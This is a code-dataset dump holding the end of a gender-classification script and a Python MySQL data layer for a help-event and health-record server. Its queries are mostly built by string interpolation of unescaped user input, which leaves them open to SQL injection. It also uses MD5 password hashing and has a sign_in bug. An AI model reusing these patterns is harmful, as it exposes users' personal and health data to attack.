so sorry sorry I am feeling terrible \nthat I am unable to fulfil a WONderful TV mathematical brutal vicious terrific problem.\"\"\"\nprint(genderDifferencesFeatures(text))\n", "repo_name": "srvCodes/Gender-Classification-of-Blog-Author", "sub_path": "genderDifferencesFeatures.py", "file_name": "genderDifferencesFeatures.py", "file_ext": "py", "file_size_in_byte": 5904, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "nltk.word_tokenize", "line_number": 56, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 57, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 58, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 59, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 60, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 61, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 62, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 63, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 64, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 65, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 66, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 67, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 68, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 69, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 70, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 71, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 72, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 73, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 74, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 75, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 76, "usage_type": "call"}]}
+{"seq_id": "14146794715", "text": "#!/usr/python\n\nimport sys\nimport random\nimport string\nimport hashlib\nimport MySQLdb\nimport ast\n\n\nfrom dbhelper import dbhelper\nfrom utils import KEY\n\n\n \n'''\nadd a new account to database.\n@params a dict data:\n includes account and password.\n@return -1 indicates params are not complete. Or account is not unique that leads to database fails.\n other number indicates success and the number is the id of the new account.\n'''\ndef add_account(data):\n if KEY.ACCOUNT not in data or KEY.PASSWORD not in data:\n return -1\n \n salt = ''.join(random.sample(string.ascii_letters, 8))\n md5_encode = hashlib.md5()\n md5_encode.update(data[KEY.PASSWORD]+salt)\n password = md5_encode.hexdigest()\n sql_account = \"insert into account (account, password, salt) values ('%s', '%s', '%s')\"\n sql_user = \"insert into user (id, nickname) values (%d, '%s')\"\n try:\n insert_id = dbhelper.insert(sql_account%(data[KEY.ACCOUNT], password, salt))\n dbhelper.insert(sql_user%(insert_id, data[KEY.ACCOUNT]))\n return insert_id\n except:\n return -1\n\n\n'''\nupdate information of an account.\n@params a dict data:\n includes id and chat_token:\n@return True if successfully modify chat_token\n False modification fails.\n'''\ndef update_account(data):\n if KEY.ID in data and KEY.CHAT_TOKEN in data:\n sql = \"update account set chat_token = '%s' where id = %d\"\n try:\n if dbhelper.execute(sql%(data[KEY.CHAT_TOKEN], data[KEY.ID])) > 0:\n return True\n except:\n return False\n else:\n return False\n\n\n'''\nmodify user's information.\n@params a dict data:\n options include user's name, nickname, gender, age, phone, location,\n (longitude and latitude), occupation, identity_id.\n@return True if successfully modify\n False modification fails.\n'''\ndef update_user(data):\n if KEY.ID not in data:\n return False\n result = True\n \n sql = \"\"\n if KEY.NAME in data:\n data[KEY.NAME] = MySQLdb.escape_string(data[KEY.NAME].encode(\"utf8\"))\n sql = \"update user set name = '%s' where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.NAME], data[KEY.ID]))\n result &= True\n except:\n result &= False\n\n if KEY.NICKNAME in data:\n data[KEY.NICKNAME] = MySQLdb.escape_string(data[KEY.NICKNAME].encode(\"utf8\"))\n sql = \"update user set nickname = '%s' where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.NICKNAME], data[KEY.ID]))\n result &= True\n except:\n result &= False\n\n if KEY.GENDER in data:\n sql = \"update user set gender = %d where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.GENDER], data[KEY.ID]))\n result &= True\n except:\n result &= False\n\n if KEY.AGE in data:\n sql = \"update user set age = %d where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.AGE], data[KEY.ID]))\n result &= True\n except:\n result &= False\n \n if KEY.PHONE in data:\n sql = \"update user set phone = '%s' where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.PHONE], data[KEY.ID]))\n result &= True\n except:\n result &= False\n\n if KEY.LOCATION in data:\n data[KEY.LOCATION] = MySQLdb.escape_string(data[KEY.LOCATION].encode(\"utf8\"))\n sql = \"update user set location = '%s' where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.LOCATION], data[KEY.ID]))\n result &= True\n except:\n result &= False\n\n if KEY.LONGITUDE in data and KEY.LATITUDE in data:\n sql = \"update user set longitude = %f, latitude = %f where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.LONGITUDE], data[KEY.LATITUDE], data[KEY.ID]))\n result &= True\n except:\n result &= False\n elif not (KEY.LONGITUDE 
not in data and KEY.LATITUDE not in data):\n result &= False\n\n if KEY.OCCUPATION in data:\n sql = \"update user set occupation = %d where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.OCCUPATION], data[KEY.ID]))\n result &= True\n except:\n result &= False\n\n if KEY.IDENTITY_ID in data:\n sql = \"update user set identity_id = '%s' where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.IDENTITY_ID], data[KEY.ID]))\n result &= True\n except:\n result &= False\n\n return result\n\n\n'''\nget salt of an account.\n@params include user's account.\n@return salt of an account.\n None if account not exists or database query error.\n'''\ndef get_salt(data):\n if KEY.ACCOUNT not in data:\n return None\n sql = \"select salt from account where account = '%s'\"\n try:\n res = dbhelper.execute_fetchone(sql%(data[KEY.ACCOUNT]))\n if res is None:\n return None\n else:\n return res[0]\n except:\n return None\n\n\n'''\nvalidate whether password is correct.\n@params includes user's account and password.\n password need to be md5 encode.\n@return user's id if password is correct.\n -1 otherwise.\n'''\ndef validate_password(data):\n if KEY.ACCOUNT not in data or KEY.PASSWORD not in data or KEY.SALT not in data:\n return -1\n sql = \"select id, password from account where account = '%s' and salt = '%s'\"\n user_id = -1\n password = None\n try:\n res = dbhelper.execute_fetchone(sql%(data[KEY.ACCOUNT], data[KEY.SALT]))\n if res is not None:\n user_id = res[0]\n password = res[1]\n except:\n pass\n finally:\n if password is None or data[KEY.PASSWORD] is None:\n return -1\n elif password == data[KEY.PASSWORD]:\n return user_id\n else:\n return -1\n\n\n'''\nmodify user's password to a new one, but not modify its salt value.\n@params include user's account. \n new password that encode with salt by md5.\n@return true if successfully modify.\n false otherwise.\n'''\ndef modify_password(data):\n if KEY.ACCOUNT not in data or KEY.PASSWORD not in data:\n return False\n sql = \"update account set password = '%s' where account = '%s'\" \n try:\n n = dbhelper.execute(sql%(data[KEY.PASSWORD], data[KEY.ACCOUNT]))\n if n > 0:\n return True\n else:\n return False\n except:\n return False\n \n \n'''\nget user's information, which includes user's name, nickname, gender ...... 
.\n@params include user's id.\n@return a json includes user's concrete information.\n None if params error or database query error.\n'''\ndef get_user_information(data):\n if KEY.ID not in data:\n return None\n sql = \"select * from user where id = %d\"\n try:\n res = dbhelper.execute_fetchone(sql%(data[KEY.ID]))\n if res is None:\n return None\n else:\n user = {}\n user[KEY.ID] = res[0]\n user[KEY.NAME] = res[1]\n user[KEY.NICKNAME] = res[2]\n user[KEY.GENDER] = res[3]\n user[KEY.AGE] = res[4]\n user[KEY.PHONE] = res[5]\n user[KEY.LOCATION] = res[6]\n user[KEY.LONGITUDE] = float(res[7])\n user[KEY.LATITUDE] = float(res[8])\n user[KEY.OCCUPATION] = res[9]\n user[KEY.REPUTATION] = float(res[10])\n user[KEY.IDENTITY_ID] = res[12]\n user[KEY.IS_VERIFY] = res[14]\n return user\n except:\n return None\n\n\n'''\nlaunch a help event by launcher.\n@params includes user's id and type of help event.\n help event types:\n 0 represents normal question.\n 1 represents nornal help.\n 2 represents emergency.\n other option params includes content of event, longitude and latitude of event.\n@return event_id if successfully launches.\n -1 if fails.\n'''\ndef add_event(data): \n if KEY.ID not in data or KEY.TYPE not in data:\n return -1\n sql = \"insert into event (launcher, type, time) values (%d, %d, now())\"\n event_id = -1\n try:\n event_id = dbhelper.insert(sql%(data[KEY.ID], data[KEY.TYPE]))\n if event_id > 0:\n data[KEY.EVENT_ID] = event_id\n update_event(data)\n return event_id\n except:\n return -1\n\n\n'''\nmodify information of a help event.\n@params includes event_id, which is id of the event to be modified.\n option params includes: content of event, longitude and latitude of event, state of event.\n@return True if successfully modifies.\n False otherwise.\n'''\ndef update_event(data):\n result = True\n sql = \"\"\n if KEY.CONTENT in data:\n data[KEY.CONTENT] = MySQLdb.escape_string(data[KEY.CONTENT].encode(\"utf8\"))\n sql = \"update event set content = '%s' where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.CONTENT], data[KEY.EVENT_ID]))\n result &= True\n except:\n result &= False\n \n if KEY.LONGITUDE in data and KEY.LATITUDE in data:\n sql = \"update event set longitude = %f, latitude = %f where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.LONGITUDE], data[KEY.LATITUDE], data[KEY.EVENT_ID]))\n result &= True\n except:\n result &= False\n\n if KEY.STATE in data:\n if data[KEY.STATE] == 0:\n data[KEY.STATE] = 1\n sql = \"update event set state = %d where id = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.STATE], data[KEY.EVENT_ID]))\n result &= True\n except:\n result &= False\n\n return result\n\n\n'''\nremove a help event by event launcher.\n@params includes user's id, which is remover. 
Actually, only the launcher can remove his/her event.\n event's id, which represents the event to be removed.\n@return True if successfully removes, or remover is not the launcher, actually nothing happens.\n False if fails.\n'''\ndef remove_event(data):\n if KEY.ID not in data or KEY.EVENT_ID not in data:\n return False\n sql = \"delete from event where id = %d and launcher = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.EVENT_ID], data[KEY.ID]))\n return True\n except:\n return False\n\n\n'''\nget information of a help event.\n@params includes id of the event to get.\n@return concrete information of the event:\n event_id, launcher's id and his/her nickname, content, type, time, longitude and latitude, state, number of followers, number of supporters and group points.\n None indicates fail query.\n'''\ndef get_event_information(data):\n if KEY.EVENT_ID not in data:\n return None\n event_info = None\n sql = \"select * from event where id = %d\"\n try:\n sql_result = dbhelper.execute_fetchone(sql%(data[KEY.EVENT_ID]))\n if sql_result is not None:\n event_info = {}\n event_info[KEY.EVENT_ID] = sql_result[0]\n event_info[KEY.LAUNCHER_ID] = sql_result[1]\n event_info[KEY.CONTENT] = sql_result[2]\n event_info[KEY.TYPE] = sql_result[3]\n event_info[KEY.TIME] = str(sql_result[4])\n event_info[KEY.LONGITUDE] = float(sql_result[5])\n event_info[KEY.LATITUDE] = float(sql_result[6])\n event_info[KEY.STATE] = sql_result[7]\n event_info[KEY.FOLLOW_NUMBER] = sql_result[8]\n event_info[KEY.SUPPORT_NUMBER] = sql_result[9]\n event_info[KEY.GROUP_PTS] = float(sql_result[10])\n user = {}\n user[KEY.ID] = event_info[KEY.LAUNCHER_ID]\n user = get_user_information(user)\n if user is not None:\n event_info[KEY.LAUNCHER] = user[KEY.NICKNAME]\n except:\n pass\n finally:\n return event_info\n\n\n'''\nget information of a collection of events.\n@params includes data, a json that contains user's id and type of events to get.\n get_event_id_list a method of getting event id list.\n@return a array of events. 
each element is information of an event in json form.\n'''\ndef get_events(data, get_event_id_list):\n    event_id_list = get_event_id_list(data)\n    event_list = []\n    event_info = {}\n    for event_id in event_id_list:\n        event_info = {KEY.EVENT_ID: event_id} # rebuild the dict each round, since get_event_information may return None\n        event_info = get_event_information(event_info)\n        if event_info is not None:\n            event_list.append(event_info)\n    return event_list\n\n\n'''\nget events that launch by user.\n@params includes user's id, \n        option params includes state indicates all events or those starting or ended.\n                              type indicates type of events.\n@return an array of result event ids.\n'''\ndef get_launch_event_list(data):\n    event_id_list = []\n    if KEY.ID not in data:\n        return event_id_list\n    sql = \"select id from event where launcher = %d\"%data[KEY.ID]\n    if KEY.STATE in data:\n        if data[KEY.STATE] == 0 or data[KEY.STATE] == 1: \n            sql += \" and state = %d\"%data[KEY.STATE]\n    if KEY.TYPE in data:\n        if data[KEY.TYPE] >= 0 and data[KEY.TYPE] <= 2:\n            sql += \" and type = %d\"%data[KEY.TYPE]\n    sql += \" order by time DESC\"\n    sql_result = dbhelper.execute_fetchall(sql)\n    for each_result in sql_result:\n        for each_id in each_result:\n            event_id_list.append(each_id)\n\n    return event_id_list\n\n\n'''\nget user's follow or support events.\n@params includes user's id and type of user's state in event.\n        user's state 0 indicates follow, and 1 indicates support.\n@return an array of result event ids.\n'''\ndef get_join_event_list(data):\n    event_id_list = []\n    if KEY.ID not in data:\n        return event_id_list\n    sql = \"select event_id from support_relation where supporter = %d\"%data[KEY.ID]\n    if KEY.TYPE in data:\n        if data[KEY.TYPE] == 1 or data[KEY.TYPE] == 2:\n            sql += \" and type = %d\"%data[KEY.TYPE]\n    sql += \" order by time DESC\"\n    sql_result = dbhelper.execute_fetchall(sql)\n    for each_result in sql_result:\n        for each_id in each_result:\n            event_id_list.append(each_id)\n\n    return event_id_list\n\n\n'''\nmanage relation of user and event.\n@params\n@return\n'''\ndef user_event_manage(data):\n    if KEY.ID not in data or KEY.EVENT_ID not in data:\n        return False\n    if KEY.OPERATION not in data:\n        return True\n    if data[KEY.OPERATION] < 0 or data[KEY.OPERATION] > 2:\n        return False\n    sql = \"select launcher from event where id = %d\"\n    launcher_id = None\n    try:\n        sql_result = dbhelper.execute_fetchone(sql%(data[KEY.EVENT_ID]))\n        if sql_result is not None:\n            launcher_id = sql_result[0]\n    except:\n        pass\n    if launcher_id is None:\n        return False\n    if data[KEY.OPERATION] == 0:\n        sql = \"delete from support_relation where event_id = %d and supporter = %d\"%(data[KEY.EVENT_ID], data[KEY.ID])\n    else:\n        sql = \"replace into support_relation (event_id, supportee, supporter, type, time) values (%d, %d, %d, %d, now())\"%(data[KEY.EVENT_ID], launcher_id, data[KEY.ID], data[KEY.OPERATION])\n    try:\n        dbhelper.execute(sql)\n    except:\n        return False\n\n    #\n    # trust and reputation compute here.\n    #\n    return True\n\n\n'''\nadd a new comment to a help event.\n@params includes event_id, represents comment belongs to which event,\n        author, user's id, author of comment,\n        content, content of comment.\n@return new comment id if succeed,\n        -1 otherwise.\n'''\ndef add_comment(data):\n    if KEY.ID not in data or KEY.EVENT_ID not in data:\n        return -1\n    if KEY.CONTENT not in data:\n        return -1\n    sql = \"insert into comment (event_id, author, content, time) values (%d, %d, '%s', now())\"\n    try:\n        comment_id = dbhelper.insert(sql%(data[KEY.EVENT_ID], data[KEY.ID], data[KEY.CONTENT]))\n        return comment_id\n    except:\n        return 
-1\n\n\n'''\nremove a comment from a help event by author him/her self.\n@params includes id, indicates author him/her self.\n        event_id, indicates which event the comment belongs to.\n        comment_id, indicates comment itself.\n@return True if delete successfully,\n        False if fails.\n'''\ndef remove_comment(data):\n    if KEY.ID not in data or KEY.EVENT_ID not in data or KEY.COMMENT_ID not in data:\n        return False\n    sql = \"delete from comment where id = %d and event_id = %d and author = %d\"\n    try:\n        dbhelper.execute(sql%(data[KEY.COMMENT_ID], data[KEY.EVENT_ID], data[KEY.ID]))\n        return True\n    except:\n        return False\n\n\n'''\nget comments of a help event.\n@params event_id, id of the help event.\n@return a list of comments. each comment contain all detail information.\n'''\ndef get_comments(data):\n    if KEY.EVENT_ID not in data:\n        return None\n    comment_list = []\n    comment = {}\n    sql = \"select id from comment where event_id = %d order by time DESC\"\n    try:\n        sql_result = dbhelper.execute_fetchall(sql%(data[KEY.EVENT_ID]))\n        for each_result in sql_result:\n            for each_id in each_result:\n                comment = {KEY.COMMENT_ID: each_id} # rebuild the dict each round, since get_comment_info may return None\n                comment = get_comment_info(comment)\n                if comment is not None:\n                    comment_list.append(comment)\n        return comment_list\n    except:\n        return None\n\n\n'''\nget detail information of a comment.\n@params includes comment_id, id of comment.\n@return information of comment, includes id of comment,\n        event_id, indicates which event belongs to,\n        author_id, author's user id,\n        author, nickname of author,\n        content, main body of comment,\n        time, add time of comment.\n        None indicates a fail query. Maybe the chosen comment doesn't exist.\n'''\ndef get_comment_info(data):\n    if KEY.COMMENT_ID not in data:\n        return None\n    sql = \"select event_id, author, content, time from comment where id = %d\"\n    comment_info = None\n    try:\n        sql_result = dbhelper.execute_fetchone(sql%(data[KEY.COMMENT_ID]))\n        if sql_result is not None:\n            comment_info = {}\n            comment_info[KEY.COMMENT_ID] = data[KEY.COMMENT_ID]\n            comment_info[KEY.EVENT_ID] = sql_result[0]\n            comment_info[KEY.AUTHOR_ID] = sql_result[1]\n            comment_info[KEY.CONTENT] = sql_result[2]\n            comment_info[KEY.TIME] = str(sql_result[3])\n            user = {}\n            user[KEY.ID] = comment_info[KEY.AUTHOR_ID]\n            user = get_user_information(user)\n            if user is not None:\n                comment_info[KEY.AUTHOR] = user[KEY.NICKNAME]\n    except:\n        pass\n    finally:\n        return comment_info\n\n\n'''\nadd a static relation between two users. The relation is single direction. 
two users in one direction could only have one type of relation.\n        type: 0 indicates family relation.\n              1 indicates geography relation.\n              2 indicates career, interest and general friend relation.\n@return True if successfully adds.\n        False otherwise.\n'''\ndef add_static_relation(data):\n    if KEY.ID not in data or KEY.USER_ID not in data or KEY.TYPE not in data:\n        return False\n    sql = \"replace into static_relation (user_a, user_b, type, time) values (%d, %d, %d, now())\"\n    try:\n        n = dbhelper.execute(sql%(data[KEY.ID], data[KEY.USER_ID], data[KEY.TYPE]))\n        if n > 0:\n            return True\n        else:\n            return False\n    except:\n        return False\n\n\n'''\nremove a static relation of two user.\n@params includes two users' id, one is called id, the other called user_id.\n@return True if successfully removes.\n        False otherwise.\n'''\ndef remove_static_relation(data):\n    if KEY.ID not in data or KEY.USER_ID not in data:\n        return False\n    sql = \"delete from static_relation where user_a = %d and user_b = %d\"\n    try:\n        n = dbhelper.execute(sql%(data[KEY.ID], data[KEY.USER_ID]))\n        if n > 0:\n            return True\n        else:\n            return False\n    except:\n        return False\n\n\n'''\ngive an evaluation to a user in a help event.\n@params includes: id, evaluater.\n        user_id, evaluatee.\n        event_id, indicates the help event.\n        value, the value of evaluation.\n@return True if successfully evaluate.\n        False otherwise.\n'''\ndef evaluate_user(data):\n    if KEY.ID not in data or KEY.USER_ID not in data or KEY.EVENT_ID not in data:\n        return False\n    if KEY.VALUE not in data:\n        return False\n    \n    value_list = ast.literal_eval(data[KEY.VALUE])\n    value = 0.0\n    for each_value in value_list:\n        value += each_value\n    list_len = len(value_list)\n    if list_len == 0:\n        list_len = 1\n    value /= list_len\n\n    sql = \"replace into evaluation (event_id, `from`, `to`, value, time) values (%d, %d, %d, %f, now())\" # backticks needed: FROM and TO are reserved words in MySQL\n    try:\n        dbhelper.execute(sql%(data[KEY.EVENT_ID], data[KEY.ID], data[KEY.USER_ID], value))\n        return True\n    except:\n        return False\n\n\n\n'''\nadd a health record of a user into database.\n@params includes id, user's id.\n        type, type of health indicator.\n        value, value of some health indicator.\n@return the health record id of the new record.\n        -1 indicates fail.\n'''\ndef health_record(data):\n    if KEY.ID not in data or KEY.TYPE not in data or KEY.VALUE not in data:\n        return -1\n    sql = \"insert into health (user_id, type, value, time) values (%d, %d, %f, now())\"\n    record_id = -1\n    try:\n        record_id = dbhelper.insert(sql%(data[KEY.ID], data[KEY.TYPE], data[KEY.VALUE]))\n    except:\n        record_id = -1\n    finally:\n        return record_id\n\n\n'''\nget details of one certain health record.\n@params includes record_id, id of the health record.\n@return details of the health record, contains record id, user id, type, certain value and record time.\n        None indicates fail query.\n'''\ndef get_health_record(record_id):\n    sql = \"select id, user_id, type, value, time from health where id = %d\"\n    record = None\n    try:\n        sql_result = dbhelper.execute_fetchone(sql%(record_id))\n        if sql_result is not None:\n            record = {}\n            record[KEY.HEALTH_ID] = sql_result[0]\n            record[KEY.USER_ID] = sql_result[1]\n            record[KEY.TYPE] = sql_result[2]\n            record[KEY.VALUE] = float(sql_result[3])\n            record[KEY.TIME] = str(sql_result[4])\n    except:\n        record = None\n    finally:\n        return record\n\n\n'''\nget all health records of a user, but at most 100 records.\n@params includes id, user's id.\n@return a list that contains all health records. 
each element is a json that contains details information of a health record.\n None indicates fail query.\n'''\ndef get_health_records(data):\n if KEY.ID not in data:\n return None\n sql = \"select id from health where user_id = %d order by time DESC limit %d\"\n sql_result = None\n try:\n sql_result = dbhelper.execute_fetchall(sql%(data[KEY.ID], 100))\n except:\n sql_result = None\n records = None\n if sql_result is not None:\n records = []\n for each_result in sql_result:\n for each_id in each_result:\n a_record = get_health_record(each_id)\n if a_record is not None:\n records.append(a_record)\n return records\n\n\n'''\nadd an illness record of a user into database.\n@params includes id, user's id.\n content, illness detail information.\n@return illness record id.\n -1 indicates fail.\n'''\ndef illness_record(data):\n if KEY.ID not in data or KEY.CONTENT not in data:\n return -1\n sql = \"insert into illness (user_id, content, time) values (%d, '%s', now())\"\n illness_id = -1\n try:\n illness_id = dbhelper.insert(sql%(data[KEY.ID], data[KEY.CONTENT]))\n except:\n illness_id = -1\n finally:\n return illness_id\n\n\n'''\nget details of an illness record.\n@params includes record id, indicates which record to be queried.\n@return content of an illness record, includes record's id, user's id, illness content and illness time.\n None indicates fail query or no such record.\n'''\ndef get_illness_record(record_id):\n sql = \"select id, user_id, content, time from illness where id = %d\"\n record = None\n try:\n sql_result = dbhelper.execute_fetchone(sql%(record_id))\n if sql_result is not None:\n record = {}\n record[KEY.ILLNESS_ID] = sql_result[0]\n record[KEY.USER_ID] = sql_result[1]\n record[KEY.CONTENT] = sql_result[2]\n record[KEY.TIME] = str(sql_result[3])\n except:\n record = None\n finally:\n return record\n\n\n'''\nget all illness records of a user, but at most 100 records.\n@params includes: id, user's id.\n@return a list that contain all illness records. each element in the list is a json that is consist of details of an illness record.\n None indicates fail query.\n'''\ndef get_illness_records(data):\n if KEY.ID not in data:\n return None\n sql = \"select id from illness where user_id = %d order by time ASC limit %d\"\n sql_result = None\n records = None\n try:\n sql_result = dbhelper.execute_fetchall(sql%(data[KEY.ID], 100))\n except:\n sql_result = None\n if sql_result is not None:\n records = []\n for each_result in sql_result:\n for each_id in each_result:\n a_record = get_illness_record(each_id)\n if a_record is not None:\n records.append(a_record)\n return records\n\n\n'''\ncreate a loving bank account. It contains loving bank and credit.\n@params includes user_id, user's id, initial coin number and initial score value.\n@return new bank account id if succeed.\n -1 if fail.\n'''\ndef create_loving_bank(data, init_coin=0, init_score=0):\n if KEY.ID not in data:\n return -1\n sql = \"insert into loving_bank (user_id, coin, score, ac_score) values (%d, %d, %d, %d)\"\n try:\n bank_account_id = dbhelper.insert(sql%(data[KEY.ID], init_coin, init_score, init_score))\n return bank_account_id\n except:\n return -1\n\n\n'''\nuser could sign in once a day. Especially, if user has signed in today, this method would return false.\n@params includes user_id. 
user's id.\n@return True if sign in successfully.\n False otherwise.\n'''\ndef sign_in(data):\n if KEY.ID not in data:\n return False\n if is_sign_in(user_id):\n return False\n sql = \"insert into sign_in (user_id, time) values (%d, now())\"\n try:\n sign_in_id = dbhelper.insert(sql%(data[KEY.ID]))\n if sign_in_id > 0:\n return True\n else:\n return False\n except:\n return False\n\n\n'''\ncheck whether a user has signed in today.\n@params includes user_id. user's id.\n@return True if user has signed in.\n False otherwise.\n'''\ndef is_sign_in(user_id):\n result = False\n sql = \"select count(*) from sign_in where user_id = %d and to_days(time) = to_days(now())\"\n try:\n sql_result = dbhelper.execute_fetchone(sql%(user_id))[0]\n if sql_result > 0:\n result = True\n else:\n result = False\n except:\n result = False\n finally:\n return result\n\n\n", "repo_name": "hs-TA/ehelp_server", "sub_path": "database/db.py", "file_name": "db.py", "file_ext": "py", "file_size_in_byte": 25742, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "utils.KEY.ACCOUNT", "line_number": 24, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 24, "usage_type": "name"}, {"api_name": "utils.KEY.PASSWORD", "line_number": 24, "usage_type": "attribute"}, {"api_name": "random.sample", "line_number": 27, "usage_type": "call"}, {"api_name": "string.ascii_letters", "line_number": 27, "usage_type": "attribute"}, {"api_name": "hashlib.md5", "line_number": 28, "usage_type": "call"}, {"api_name": "utils.KEY.PASSWORD", "line_number": 29, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 29, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.insert", "line_number": 34, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 34, "usage_type": "name"}, {"api_name": "utils.KEY.ACCOUNT", "line_number": 34, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 34, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.insert", "line_number": 35, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 35, "usage_type": "name"}, {"api_name": "utils.KEY.ACCOUNT", "line_number": 35, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 35, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 49, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 49, "usage_type": "name"}, {"api_name": "utils.KEY.CHAT_TOKEN", "line_number": 49, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 52, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 52, "usage_type": "name"}, {"api_name": "utils.KEY.CHAT_TOKEN", "line_number": 52, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 52, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 52, "usage_type": "attribute"}, {"api_name": "utils.KEY.ID", "line_number": 69, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 69, "usage_type": "name"}, {"api_name": "utils.KEY.NAME", "line_number": 74, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 74, "usage_type": "name"}, {"api_name": "utils.KEY.NAME", "line_number": 75, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 75, "usage_type": "name"}, {"api_name": "MySQLdb.escape_string", "line_number": 75, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 78, "usage_type": "call"}, 
{"api_name": "dbhelper.dbhelper", "line_number": 78, "usage_type": "name"}, {"api_name": "utils.KEY.NAME", "line_number": 78, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 78, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 78, "usage_type": "attribute"}, {"api_name": "utils.KEY.NICKNAME", "line_number": 83, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 83, "usage_type": "name"}, {"api_name": "utils.KEY.NICKNAME", "line_number": 84, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 84, "usage_type": "name"}, {"api_name": "MySQLdb.escape_string", "line_number": 84, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 87, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 87, "usage_type": "name"}, {"api_name": "utils.KEY.NICKNAME", "line_number": 87, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 87, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 87, "usage_type": "attribute"}, {"api_name": "utils.KEY.GENDER", "line_number": 92, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 92, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 95, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 95, "usage_type": "name"}, {"api_name": "utils.KEY.GENDER", "line_number": 95, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 95, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 95, "usage_type": "attribute"}, {"api_name": "utils.KEY.AGE", "line_number": 100, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 100, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 103, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 103, "usage_type": "name"}, {"api_name": "utils.KEY.AGE", "line_number": 103, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 103, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 103, "usage_type": "attribute"}, {"api_name": "utils.KEY.PHONE", "line_number": 108, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 108, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 111, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 111, "usage_type": "name"}, {"api_name": "utils.KEY.PHONE", "line_number": 111, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 111, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 111, "usage_type": "attribute"}, {"api_name": "utils.KEY.LOCATION", "line_number": 116, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 116, "usage_type": "name"}, {"api_name": "utils.KEY.LOCATION", "line_number": 117, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 117, "usage_type": "name"}, {"api_name": "MySQLdb.escape_string", "line_number": 117, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 120, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 120, "usage_type": "name"}, {"api_name": "utils.KEY.LOCATION", "line_number": 120, 